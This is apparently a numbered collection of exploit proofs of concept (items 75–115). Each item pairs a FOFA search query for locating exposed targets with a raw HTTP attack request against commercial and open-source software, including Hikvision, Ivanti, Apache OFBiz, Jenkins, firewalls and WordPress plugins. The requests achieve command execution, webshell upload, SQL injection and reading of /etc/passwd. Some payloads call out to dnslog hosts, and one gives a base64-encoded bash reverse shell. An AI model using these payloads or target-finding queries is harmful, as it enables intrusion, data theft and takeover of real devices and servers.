PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 掌上校园 campus service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software system UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 flow-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password leak
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it writes a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 (DBAPPSecurity) 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 (DBAPPSecurity) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 (Seeyon) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 (Hikvision) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信 (QAX) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qianxin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"topicurl":"getSysStatusCfg","token":""}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
